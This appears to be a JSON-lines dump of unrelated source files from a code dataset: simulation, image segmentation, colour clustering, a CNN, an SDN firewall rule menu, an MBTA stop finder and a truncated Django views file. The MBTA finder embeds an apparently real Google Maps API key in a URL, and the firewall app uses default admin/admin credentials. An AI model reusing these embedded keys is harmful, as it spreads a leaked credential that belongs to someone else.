+{"seq_id":"284317083","text":"# makes KratosMultiphysics backward compatible with python 2.6 and 2.7\nfrom __future__ import print_function, absolute_import, division\n\nimport sys\nimport math\n\nfrom KratosMultiphysics import *\nfrom KratosMultiphysics.Contact_2DApplication import *\nfrom KratosMultiphysics.UserCustomApplication import *\nimport numpy as np\n\nmodel_part = ModelPart(\"ModelPart\")\nmodel_part.AddNodalSolutionStepVariable(DISPLACEMENT)\nmodel_part.AddNodalSolutionStepVariable(VELOCITY)\nmodel_part.AddNodalSolutionStepVariable(ACCELERATION)\nmodel_part.AddNodalSolutionStepVariable(FORCE)\nmodel_part.AddNodalSolutionStepVariable(POSITIVE_FACE_PRESSURE)\nmodel_part.AddNodalSolutionStepVariable(NEGATIVE_FACE_PRESSURE)\nmodel_part.AddNodalSolutionStepVariable(IS_BODY)\nmodel_part.AddNodalSolutionStepVariable(IS_COVER)\n\nmodel_part_io = ModelPartIO(\"InputData\")\nmodel_part_io.ReadModelPart(model_part)\n\n# we add the DoFs\nfor node in model_part.Nodes:\n node.AddDof(DISPLACEMENT_X)\n node.AddDof(DISPLACEMENT_Y)\n node.AddDof(DISPLACEMENT_Z)\n # print(node)\n# set d time in process info\n# model_part.ProcessInfo[DELTA_TIME] = 0.01\n\nBodyRecognitionProcess(model_part, 2).Execute()\nBoundaryRecognitionProcess(model_part, 2).Execute()\n\n\n# print(\"NumberOfMeshes is \", model_part.NumberOfMeshes())\n\ntime_scheme = 
ResidualBasedIncrementalUpdateStaticScheme()\n# time_scheme = BossakTimeScheme(0.9)\nlinear_solver = SkylineLUFactorizationSolver()\nconv_criteria = DisplacementCriteria(1e-6, 1e-9)\nbuilder_and_solver = ResidualBasedEliminationBuilderAndSolver(\n linear_solver)\n\nspace_utils = UblasSparseSpace()\n\npA = space_utils.CreateEmptyMatrixPointer()\npDx = space_utils.CreateEmptyVectorPointer()\npb = space_utils.CreateEmptyVectorPointer()\npri = space_utils.CreateEmptyVectorPointer()\npr0 = space_utils.CreateEmptyVectorPointer()\npun0 = space_utils.CreateEmptyVectorPointer()\npun = space_utils.CreateEmptyVectorPointer()\n\nA = (pA).GetReference()\nDx = (pDx).GetReference()\nb = (pb).GetReference()\nri = (pri).GetReference()\nr0 = (pr0).GetReference()\nun0 = (pun0).GetReference()\nun = (pun).GetReference()\n\ntime_scheme.InitializeSolutionStep(model_part, A, Dx, b)\ntime_scheme.InitializeElements(model_part)\n\nbuilder_and_solver.SetUpDofSet(time_scheme, model_part)\nbuilder_and_solver.SetUpSystem(model_part)\nbuilder_and_solver.ResizeAndInitializeVectors(\n pA, pDx, pb, model_part.Elements, model_part.Conditions, model_part.ProcessInfo)\n\nbuilder_and_solver.InitializeSolutionStep(model_part, A, Dx, b)\nbuilder_and_solver.SetEchoLevel(1)\n\nspace_utils.ResizeVector(ri, b.Size())\nspace_utils.ResizeVector(r0, b.Size())\nspace_utils.ResizeVector(un0, b.Size())\nspace_utils.ResizeVector(un, b.Size())\n\nspace_utils.SetToZeroMatrix(A)\nspace_utils.SetToZeroVector(Dx)\nspace_utils.SetToZeroVector(b)\nspace_utils.SetToZeroVector(ri)\nspace_utils.SetToZeroVector(r0)\nspace_utils.SetToZeroVector(un0)\nspace_utils.SetToZeroVector(un)\n\n#Creating GidIO\ngid_mode = GiDPostMode.GiD_PostBinary # or GiDPostMode.GiD_PostAscii\nuse_multi_file = MultiFileFlag.MultipleFiles # or MultiFileFlag.SingleFile\ndeformed_mesh_flag = WriteDeformedMeshFlag.WriteDeformed # or WriteDeformedMeshFlag.WriteUndeformed\nwrite_conditions = WriteConditionsFlag.WriteElementsOnly # or WriteConditionsFlag.WriteConditions\n\ngid_io = GidIO(\"test\",gid_mode,use_multi_file,deformed_mesh_flag, write_conditions)\n\ngid_io.InitializeMesh( 0.0 )\ngid_io.WriteMesh(model_part.GetMesh() ) \ngid_io.FinalizeMesh()\n\ntime_step = 1e-3\nmodel_part.SetBufferSize(2)\nmodel_part.CloneTimeStep()\nmodel_part.ProcessInfo[DELTA_TIME] = time_step \n\nlhs = np.zeros((b.Size() + 5, b.Size() + 5))\nrhs = np.zeros(b.Size() + 5)\ndx = np.zeros(b.Size() + 5)\n\nbuilder_and_solver.BuildRHS(time_scheme, model_part, r0)\ngid_io.InitializeResults(0.0,(model_part).GetMesh()) \nfor i in range(1):\n epsilon = 1.0\n while epsilon > 1e-12:\n space_utils.SetToZeroMatrix(A)\n space_utils.SetToZeroVector(Dx)\n space_utils.SetToZeroVector(ri)\n\n builder_and_solver.Build(time_scheme, model_part, A, ri)\n for r in range(b.Size()):\n rhs[r] = r0[r]\n for c in range(b.Size()):\n lhs[r,c] = A[r,c]\n\n lhs[0,11] = -1.00\n lhs[0,14] = 1/3\n\n lhs[1,12] = -1.00\n lhs[1,14] = 2/3\n lhs[1,15] = 2/3\n\n lhs[2,13] = -1.00\n lhs[2,15] = 1/3\n\n lhs[3,11] = 2.5/3\n\n lhs[4,11] = 0.5/3\n lhs[4,12] = 1/2\n lhs[4,14] = -1.00\n\n lhs[5,15] = -1.00\n lhs[5,12] = 1/2\n lhs[5,11] = 0.5/3\n\n lhs[6,13] = 2.5/3\n ###\n lhs[11,0] = 1.00\n lhs[11,3] = -1.5/2\n lhs[11,4] = -0.5/2\n\n lhs[12,2] = 1.00\n lhs[12,6] = -1.5/2\n lhs[12,5] = -0.5/2\n\n lhs[13,1] = 1.00\n lhs[13,4] = -1/2\n lhs[13,5] = -1/2\n\n lhs[14,4] = 1.00\n lhs[14,0] = -1/3\n lhs[14,1] = -2/3\n\n lhs[15,5] = 1.00\n lhs[15,1] = -2/3\n lhs[15,2] = -1/3\n \n dx = np.dot(np.linalg.inv(lhs), rhs)\n \n for r in range(b.Size()):\n Dx[r] = 
dx[r]\n\n space_utils.ScaleAndAdd(1, Dx, 1, un);\n \n if (space_utils.TwoNorm(Dx) == 0):\n print(\"Dx = 0!!!\")\n sys.exit(1)\n # builder_and_solver.SystemSolve(A, Dx, r0 + ri)\n # print(\"A is \", A)\n # print(\"r0 is \", r0)\n # print(\"ri is \", ri)\n # print(\"Dx is \", Dx)\n space_utils.ScaleAndAdd(1, Dx, 1, un);\n \n time_scheme.Update(model_part, builder_and_solver.GetDofSet(), A, Dx, r0)\n \n if space_utils.TwoNorm(un - un0) < 1e-12:\n epsilon = space_utils.TwoNorm(Dx)\n else:\n epsilon = space_utils.TwoNorm(Dx)/space_utils.TwoNorm(un-un0)\n # print(\"epsilon is \", epsilon)\n break\n\n # var = raw_input(\"Finish step, go ahead?: \")\n # if var == '0':\n # sys.exit(1) \n\n print(\"conv is \", epsilon)\n for node in model_part.Nodes:\n print(\"curr disp is \", node.GetSolutionStepValue(DISPLACEMENT_Y, 0))\n # print(\"delta u is \", un - un0)\n space_utils.ScaleAndAdd(1, un, 0, un0)\n model_part.CloneTimeStep()\n model_part.ProcessInfo[DELTA_TIME] = time_step\n gid_io.WriteNodalResults(DISPLACEMENT,model_part.Nodes,i,0)\n # var = raw_input(\"Finish step, go ahead?: \")\n\ngid_io.FinalizeResults()\n# print(\"NumberOfMeshes is \", model_part.NumberOfMeshes)\n\nsys.exit(1)\nfor node in model_part.GetMesh(0).Nodes:\n if node.Y == 0:\n print(node.GetSolutionStepValue(DISPLACEMENT,0))\n # print(node.Id)\n # sys.exit(1)\n# import numpy as np\n# no1 = np.zeros((622, 2), dtype=np.double)\n# no2 = np.zeros((622, 2), dtype=np.double)\n# i = 0\n# j = 0\n# for node in model_part.Nodes:\n# if(node.GetSolutionStepValue(IS_BODY) == 2):\n# no1[i] = (node.X, node.Y)\n# i = i + 1\n# else:\n# no2[j] = (node.X, node.Y)\n# j = j + 1\n# import matplotlib.pyplot as plt\n# plt.plot(no2[:, 0], no2[:, 1], 'bs', no1[:, 0], no1[:, 1], 'ro')\n# os.chdir(\"/home/hoan/Desktop\")\n# plt.savefig(\"body.png\")\n# plt.show()\n# we create a mesh for the postprocess\n","sub_path":"contact_2D_application/test_examples/test_mortar/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"46764737","text":"'''\r\n该文件用于将模型加载,对请求中的图片进行预处理以及预测\r\n@Project :FlatAngleAPI\r\n@File :utils_v1.py\r\n@Author :谢逸帆\r\n@Date :2021/7/14 14:23 \r\n'''\r\nimport cv2\r\nimport tensorflow as tf\r\nimport pathlib\r\nfrom Segmentation.UNet.info import *\r\nimport numpy as np\r\n\r\nfile_root = UN_PRODUCED_FILE_PTAH\r\n\r\nmodel = tf.keras.models.load_model(MODULE_PATH)\r\n\r\n\r\ndef load_dataset(image_name):\r\n \"\"\"\r\n 将客户端传来的图片文件转为张量数据集\r\n \"\"\"\r\n file_paths = list(pathlib.Path(file_root).glob(fr'{image_name}'))\r\n file_paths = [str(path) for path in file_paths]\r\n file_ds = tf.data.Dataset.from_tensor_slices(file_paths)\r\n file_ds = file_ds.map(load_and_decode_img)\r\n file_ds = file_ds.batch(1)\r\n return file_ds\r\n\r\n\r\ndef load_and_decode_img(path):\r\n \"\"\"\r\n 根据图片路径将图片转换为张量\r\n \"\"\"\r\n img = tf.io.read_file(path)\r\n img = tf.image.decode_image(img, channels=3)\r\n return img\r\n\r\n\r\ndef process(file, image_path):\r\n \"\"\"\r\n 模型进行预测并处理图像\r\n \"\"\"\r\n img = tf.image.resize(file, (MODULE_SIZE, MODULE_SIZE))\r\n img = tf.cast(img, tf.float32) / 255.0\r\n mask = create_mask(model.predict(img))\r\n mask = tf.image.resize(mask, (file.shape[1], file.shape[2]))\r\n mask = mask.numpy()\r\n # 优化部分\r\n kernel = np.ones((int(2 * mask.shape[0] / MODULE_SIZE), int(2 * mask.shape[1] / MODULE_SIZE)),\r\n dtype=np.uint8)\r\n mask = cv2.dilate(mask, kernel, 1)\r\n mask = cv2.medianBlur(mask, 5)\r\n #\r\n image 
= cv2.imread(image_path)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2BGRA)\r\n mask = np.expand_dims(mask, axis=2)\r\n image = image * mask\r\n\r\n return image\r\n\r\n\r\ndef create_mask(pred_mask):\r\n \"\"\"\r\n 将predict返回的标签掩码图张量译码为012的格式\r\n \"\"\"\r\n pred_mask = tf.argmax(pred_mask, axis=-1)\r\n pred_mask = pred_mask[..., tf.newaxis]\r\n pred_mask = pred_mask[0]\r\n\r\n return pred_mask\r\n","sub_path":"UNet/utils_v1.py","file_name":"utils_v1.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"610846632","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n################################\n################################\n# Class명 : GatherColorInformation\n# 작성자 : 이현지\n# 설명 : user가 입력한 이미지를 분석하여 색 띠 반환\n# 참고한 코드 출처 : https://buzzrobot.com/dominant-colors-in-an-image-using-k-means-clustering-3c7af4622036\n################################\n################################\nclass GatherColorInformation:\n\n CLUSTERS = None\n IMAGE = None\n COLORS = None\n LABELS = None\n\n def __init__(self, image, clusters=3):\n self.CLUSTERS = clusters\n self.IMAGE = image\n\n #kmeans clustering 알고리즘을 이용하여 각 픽셀 처리\n #cluster값은 5로 제시한다.\n def dominantColors(self):\n img = cv2.imread(self.IMAGE)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = img.reshape((img.shape[0] * img.shape[1]), 3)\n kmeans = KMeans(n_clusters=self.CLUSTERS)\n kmeans.fit(img)\n\n return kmeans\n\n # clusters=5에 따라 5개의 색상(r,g,b)을 return 하게 된다.\n def getRGB(self, kmeans):\n self.COLORS = kmeans.cluster_centers_\n self.LABELS = kmeans.labels_\n\n return self.COLORS.astype(int)\n\n #히스토그램으로 표현하기\n def intoHistogram(self, kmeans):\n numLabels = np.arange(0, self.CLUSTERS+1)\n (hist, _)=np.histogram(self.LABELS, bins=numLabels)\n\n hist=hist.astype(\"float\")\n hist /= hist.sum()\n\n return hist\n\n #색상이 차지하는 비율 순으로 정렬한 후, 이를 바탕으로 색 띠를 생성하여 리턴한다\n def plot_colors(self, hist, centroids):\n colors=self.COLORS\n colors=colors[(-hist).argsort()]\n hist=hist[(-hist).argsort()]\n\n bar=np.zeros((50,500,3), dtype=\"uint8\")\n startX=0\n\n for i in range(0, self.CLUSTERS-1):\n endX= startX+hist[i]*500\n\n r=int(colors[i][0])\n g=int(colors[i][1])\n b=int(colors[i][2])\n\n cv2.rectangle(bar, (int(startX), 0), (int(endX), 50), (r,g,b), -1)\n startX=endX\n\n return bar\n\n################################\n################################\n# Class명 : Compare\n# 작성자 : 이현지\n# 설명 : 두 이미지를 분석한 색상 결과를 비교\n################################\n################################\nclass Compare:\n\n colorA=None\n ColorB=None\n\n def __init__(self, colors):\n self.colorA=colors[0]\n self.colorB=colors[1]\n\n #두 이미지를 분석한 결과로 나온 dominant colors들을 비교\n #색상이 일치하지 않으면서, 이미지 내에서 차지하는 비율이 큰 색상을 no match color로 선정한다.\n def getNoMatchColor(self):\n noMatches = []\n for color in self.colorA:\n if color not in self.colorB:\n noMatches.append(color)\n\n noMatchColor = noMatches[0]\n\n return noMatchColor\n\n\n################################\n################################\n# Class명 : ImageProducing\n# 작성자 : 이현지\n# 설명 : no match color 영역을 이미지에서 찾아 표시한다\n# 참고한 코드 출처 : https://www.pyimagesearch.com/2014/08/04/opencv-python-color-detection/\n################################\n################################\nclass ImageProducing:\n\n IMAGE = None\n\n def __init__(self, image):\n self.IMAGE = cv2.imread(image)\n\n def markNoMatchColor(self,color):\n\n hsv = cv2.cvtColor(self.IMAGE, cv2.COLOR_BGR2HSV)\n\n #rgb순으로 
표현되어있는 color를 bgr형태로 변환\n [b,g,r]=[color[2],color[1],color[0]]\n bgrColor=np.uint8([[[b,g,r]]])\n\n #색상 추출을 위해 bgr을 hsv로 변환\n hsv_noMatch=cv2.cvtColor(bgrColor, cv2.COLOR_BGR2HSV)\n\n #색상의 min hsv, max hsv 범위 추출\n min_h=hsv_noMatch[0][0][0]-10\n min_noMatch=np.array([min_h, 100, 100])\n max_h=hsv_noMatch[0][0][0]+10\n max_noMatch=np.array([max_h, 255, 255])\n kernel = np.ones((5, 5), \"uint8\")\n\n noMatch=cv2.inRange(hsv, min_noMatch, max_noMatch)\n noMatch=cv2.dilate(noMatch, kernel)\n\n #no match color 영역 표시하기\n (_, contours, hierarchy) = cv2.findContours(noMatch, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n for pic, contour in enumerate(contours):\n area = cv2.contourArea(contour)\n if (area > 150):\n ellipse=cv2.fitEllipse(contour)\n cv2.ellipse(self.IMAGE, ellipse, (0,0,255),1, cv2.LINE_AA)\n\n cv2.imshow('marked image', self.IMAGE)\n\n\nuser='../images/NoMatch_testImage/room2.jpg'\nideal='../images/NoMatch_testImage/room6.jpg'\ntestimage='testimage.jpg'\nimages=[user, ideal]\ncolors=[]\nbars=[]\nclusters=5\n\nfor i in range(len(images)):\n colorInfo=GatherColorInformation(images[i], clusters)\n kmeans=colorInfo.dominantColors()\n color=colorInfo.getRGB(kmeans)\n colors.append(color)\n hist=colorInfo.intoHistogram(kmeans)\n bar=colorInfo.plot_colors(hist, kmeans.cluster_centers_)\n bars.append(bar)\n\n\ncmp=Compare(colors)\nnoMatch=cmp.getNoMatchColor()\n\n#이미지 display\nuserRoom=cv2.imread('../images/NoMatch_testImage/room2.jpg')\nidealRoom=cv2.imread('../images/NoMatch_testImage/room6.jpg')\n\ncv2.imshow('user room', userRoom)\nif(len(images)==2):\n cv2.imshow('ideal room', idealRoom)\n\nfor i in range(len(images)):\n plt.figure()\n plt.axis(\"off\")\n plt.imshow(bars[i])\nplt.show()\n\nmark=ImageProducing(images[0])\nmark.markNoMatchColor(noMatch)\n\nkey = cv2.waitKey(0)\nif key == 27:\n cv2.destroyAllWindows()\n\n\n\n","sub_path":"Python/NoMatchColor.py","file_name":"NoMatchColor.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"92494210","text":"from fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport pandas\n\ndef get_product_choices():\n colnames = [\"FOOD_NAME\", \"SCIENTIFIC_NAME\",\t\"GROUP\" ,\"SUB_GROUP\"]\n data = pandas.read_csv('generic-food.csv', names=colnames)\n\n choices = data.FOOD_NAME.tolist()\n return choices\n\ndef main():\n products = get_product_choices()\n guesses = [\"tomato sauce\", \"frt salad\", \"ft sd\"]\n\n for guess in guesses:\n res = process.extractOne(guess, products)\n print(\"guess <\" + guess + \"> gives you <\" + res[0] + \"> with a ratio value of <\" + str(res[1]) + \">\")\n print(res)\n\n\nif __name__ == '__main__':\n main()","sub_path":"hello_fuzzy.py","file_name":"hello_fuzzy.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"506192362","text":"# test harness for evaluating models on the cifar10 dataset\nimport sys\nfrom matplotlib import pyplot\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.optimizers import SGD\n\n\n\ntags = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\n\n\n# load train and 
test dataset\ndef load_dataset():\n\t# load dataset\n\t(trainX, trainY), (testX, testY) = cifar10.load_data()\n\t# one hot encode target values\n\ttrainY = to_categorical(trainY)\n\ttestY = to_categorical(testY)\n\treturn trainX, trainY, testX, testY\n\n# scale pixels\ndef prep_pixels(train, test):\n\t# convert from integers to floats\n\ttrain_norm = train.astype('float32')\n\ttest_norm = test.astype('float32')\n\t# normalize to range 0-1\n\ttrain_norm = train_norm / 255.0\n\ttest_norm = test_norm / 255.0\n\t# return normalized images\n\treturn train_norm, test_norm\n\n# define cnn model\ndef define_model():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same', input_shape=(32, 32, 3)))\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_uniform', padding='same'))\n\tmodel.add(MaxPooling2D((2, 2)))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu', kernel_initializer='he_uniform'))\n\tmodel.add(Dense(10, activation='softmax'))\n\t# compile model\n\topt = SGD(learning_rate=0.001, momentum=0.9)\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\n\treturn model\n\n\n# run the test harness for evaluating a model\ndef run_test_harness():\n\t# load dataset\n\ttrainX, trainY, testX, testY = load_dataset()\n\t# prepare pixel data\n\ttrainX, testX = prep_pixels(trainX, testX)\n\t# define model\n\tmodel = define_model()\n # fit model\n\thistory = model.fit(trainX, trainY, epochs=1, batch_size=128, validation_data=(testX, testY))\n\t# evaluate model\n\t_, acc = model.evaluate(testX, testY)\n\tprint('> %.3f' % (acc * 100.0))\n\t# learning curves\n\t#summarize_diagnostics(history)\n\n# entry point, run the test harness\nrun_test_harness()","sub_path":"VGG-one-block.py","file_name":"VGG-one-block.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"109916181","text":"#!/usr/bin/python\n\nimport requests\nimport json\nimport getopt\nimport sys\nimport signal\nimport Firewall as server\n\nfilename2=\"./firewall_flows_menu\"\n\ndef f(signo, stack):\n server.cleanUp()\n exit(0)\n\ndef application(argv):\n username = \"admin\"\n password = \"admin\"\n ip = \"127.0.0.1\"\n port = \"8181\"\n opts, args = getopt.getopt(argv, \"p:i:d:\", [\"ip=\", \"port=\", \"debug\"])\n debug = False\n\n for opt, arg in opts:\n if opt in (\"-p\", \"--port\"):\n port = arg\n elif opt in (\"-d\", \"--debug\"):\n debug = True\n elif opt in (\"-i\", \"--ip\"):\n ip = arg\n\n\n print(\"Initializing application with arguments: \")\n print(\"\\tUsername: %s \" % username)\n print(\"\\tPassword: %s \" % password)\n print(\"\\tServer socket: %s:%s \" % (ip, port))\n print(\"\")\n\n server.init(ip, port, username, password)\n\n if debug:\n status, data = server.getTopology()\n print(\"Status: \" + str(status))\n print(\"Data : \" + str(data))\n\n # raw_input(\"press enter to activate firewall\")\n\n signal.signal(signal.SIGINT, 
f)\n\n \n\n ids_per_case = {}\n\n flow_id = 1\n\n while True:\n filee = open(filename2, \"r\")\n print(filee.read())\n line = raw_input(\"Type your command:\")\n\n tokens = line.split(\" \")\n\n flow_id = flow_id +1\n\n x = tokens[0]\n y = tokens[1] if len(tokens) > 1 else None\n\n if x == 'e' or x == \"exit\":\n break\n\n if x == \"on\": \n if y == \"1\":\n print(\"adding rules of case #1: Block ICMP on switch 1\")\n status, data, topologyIdentity1 = server.addBlockAction(1, 0, 1, \"ICMP\") \n if not ids_per_case.get(\"1\"):\n ids_per_case[\"1\"] = []\n ids_per_case[\"1\"].append(topologyIdentity1)\n \n if y == \"2\":\n print(\"adding rules of case #2: Block any TCP connection from 10.0.0.[1-3] to 10.0.0.5 on switch 1\")\n status, data, topologyIdentity2 = server.addBlockAction(1, 0, 2, \"TCP\", \"10.0.0.0/30\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"2\"):\n ids_per_case[\"2\"] = []\n ids_per_case[\"2\"].append(topologyIdentity2) \n\n if y == \"3\":\n print(\"adding rules of case #3: Block any TCP connection from 10.0.1.[1-5] to 10.0.0.5 on switch 2\")\n status, data, topologyIdentity3 = server.addBlockAction(2, 0, 3, \"TCP\", \"10.0.1.0/29\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"3\"):\n ids_per_case[\"3\"] = []\n ids_per_case[\"3\"].append(topologyIdentity3) \n\n if y == \"4\":\n print(\"adding rules of case #4: Block any TCP connection from 10.0.0.4 to 10.0.0.5 on switch 2\")\n status, data, topologyIdentity4 = server.addBlockAction(2, 0, 4, \"TCP\", \"10.0.0.4/32\", \"10.0.0.5/32\") \n if not ids_per_case.get(\"4\"):\n ids_per_case[\"4\"] = []\n ids_per_case[\"4\"].append(topologyIdentity4) \n\n if y == \"5\":\n print(\"adding rules of case #5: Block any ICMP connection from 10.0.0.[1-3] to 10.0.1.[1-5] on switch 1\")\n status, data, topologyIdentity5 = server.addBlockAction(1, 0, 5, \"ICMP\", \"10.0.0.0/30\", \"10.0.1.0/29\") \n if not ids_per_case.get(\"5\"):\n ids_per_case[\"5\"] = []\n ids_per_case[\"5\"].append(topologyIdentity5) \n\n if y == \"6\":\n print(\"adding rules of case #6: Block any UDP connection from 10.0.0.[1-3] to 10.0.1.[1-5] on switch 1\")\n status, data, topologyIdentity6 = server.addBlockAction(1, 0, 6, \"UDP\", \"10.0.0.0/30\", \"10.0.1.0/29\",udp_src_port=\"5566\", udp_dest_port =\"5566\") \n\n if not ids_per_case.get(\"6\"):\n ids_per_case[\"6\"] = []\n ids_per_case[\"6\"].append(topologyIdentity6) \n\n if y == \"7\":\n print(\"adding rules of case #7: Block any connection from 10.0.1.[1-5] to further network on switch 1\")\n status, data, topologyIdentity7 = server.addBlockAction(2, 0, 7, None, \"10.0.1.0/29\",\"10.0.0.4/32\") \n\n if not ids_per_case.get(\"7\"):\n ids_per_case[\"7\"] = []\n ids_per_case[\"7\"].append(topologyIdentity7) \n\n if y == \"8\":\n print(\"adding rules of case #8: Block any connection between business hosts on switch 1\")\n status, data, topologyIdentity8 = server.addBlockAction(1, 0, 8, None, \"10.0.0.0/30\",\"10.0.0.0/30\") \n\n if not ids_per_case.get(\"8\"):\n ids_per_case[\"8\"] = []\n ids_per_case[\"8\"].append(topologyIdentity8) \n\n if x == \"off\":\n print(\"removing rules of case #\" + y)\n for ti in ids_per_case[y]:\n server.removeAction(ti) \n\n\n if x == 'h' or x == \"help\":\n filee = open(filename2, \"r\")\n print(filee.read())\n\n if x == 'c' or x == \"clear\":\n server.cleanUp() \n\n \n\n\n \n server.cleanUp()\n\n\nif __name__ == '__main__':\n 
application(sys.argv[1:])\n","sub_path":"exercise1/odl_controll/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"532133447","text":"\"\"\"\nGeocoding and Web APIs Project Toolbox exercise\n\nFind the MBTA stops closest to a given location.\n\nFull instructions are at:\nhttps://sites.google.com/site/sd15spring/home/project-toolbox/geocoding-and-web-apis\n\"\"\"\n\nimport urllib # urlencode function\nimport urllib2 # urlopen function (better than urllib version)\nimport json\nfrom pprint import pprint\n\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nGMAPS_BASE_URL = \"https://maps.googleapis.com/maps/api/geocode/json\"\nMBTA_BASE_URL = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation\"\nMBTA_DEMO_API_KEY = \"wX9NwuHnZU2ToO7GmGR9uw\"\n\n\n# A little bit of scaffolding if you want to use it\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n f = urllib2.urlopen(url) #opens url\n response_text = f.read() #reads through url\n response_data = json.loads(response_text) #converts data to json\n return response_data\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n\n See https://developers.google.com/maps/documentation/geocoding/\n for Google Maps Geocode API URL formatting requirements.\n \"\"\"\n new_place = place_name.replace(' ', \"+\") #replaces spaces with + symbols for url \n url = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + new_place + \"&key=AIzaSyAqswAJZEulRtIHPvMpyCEYMT8XpU8uCM4\" \n #generates url and then retrives the json\n json = get_json(url)\n results = json[\"results\"][0]['geometry']['location'] #locates the necessary part of the dictionary in the json\n lat_long = results['lat'],results['lng'] #creates a tuple of lat and long\n return lat_long #tuple\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, distance)\n tuple for the nearest MBTA station to the given coordinates.\n\n See l for URL\n formatting requirements for the 'stopsbylocation' API.\n \"\"\"\n #makes latitude and longitude strings so that they can be entered into url\n latitude = str(latitude)\n longitude = str(longitude)\n #defines url\n url = \"http://realtime.mbta.com/developer/api/v2/stopsbylocation?api_key=\"+ MBTA_DEMO_API_KEY + \"&lat=\" + latitude + \"&lon=\" + longitude + \"&format=json\"\n #generates json object and then calls the relevant quantities \n json = get_json(url)\n distance = json['stop'][0]['distance']\n stopname = json['stop'][0]['stop_name']\n #returns of a tuple of stopname, distance from stop\n return (stopname, distance)\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, print the nearest MBTA stop and the \n distance from the given place to that stop.\n \"\"\"\n #get lat and long of a place name, and then seperate the returned tuple into seperate entities\n lat_long = get_lat_long(place_name)\n lat = lat_long[0]\n lon = lat_long[1]\n #get the nearest stop from the lat lon entities \n stop_distance = get_nearest_station(lat, lon)\n #converts unicode to strings\n stop = str(stop_distance[0])\n distance = str(stop_distance[1])\n #returns a sentence indicating where the closest 
stop is to the place name entered \n return place_name +' is ' + distance + \" miles away from \" + stop\n\n","sub_path":"toolbox/geocoding_apis/mbta_finder.py","file_name":"mbta_finder.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"71586867","text":"# FANAVARD 3.11.99\r\n\r\n\r\n# Team Name = AUT FAN\r\n\r\n# Team Member\r\n# Ali Rahimi\r\n# Hamid Parto Alam\r\n# Sina Hasan lou\r\n\r\n# number of objects\r\nn = int(input('Enter number of objects = '))\r\n\r\n# number of boxes\r\nm = int(input('Enter number of boxes = '))\r\n\r\n# size of boxes\r\nk = int(input('Enter size of boxes = '))\r\n\r\nai = []\r\n# each object size\r\nfor item in range(n):\r\n ai.append(int(input(\"a(\"+str(item+1)+\") = \")))\r\n\r\n\r\n# size arrays should be equal to number of objects\r\nif (len(ai) != n):\r\n print('wrong input')\r\n\r\nj = 1\r\nsize = k\r\n\r\nwhile (j<=n):\r\n # check if there is a box left\r\n if (m > 0):\r\n # check if the box has empty place\r\n if (ai[n-j] <= size):\r\n\r\n size = size-ai[n-j]\r\n j = j+1\r\n else:\r\n m = m-1 \r\n size = k\r\n else:\r\n break\r\n\r\n# print result\r\nres = j-1\r\nprint(\"Output = \" + str(res))\r\n","sub_path":"fanavard-01.py","file_name":"fanavard-01.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"331927366","text":"from django.shortcuts import render, get_object_or_404, redirect # added 'get_object_or_404' and 'redirect'\nfrom django.contrib.auth.models import User # ← added for user info\nfrom django.contrib.auth.forms import UserCreationForm # ← added for user registration\nfrom django.contrib.auth import authenticate, login # ← added for the login form\nfrom .models import Photo # Photo instance\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import 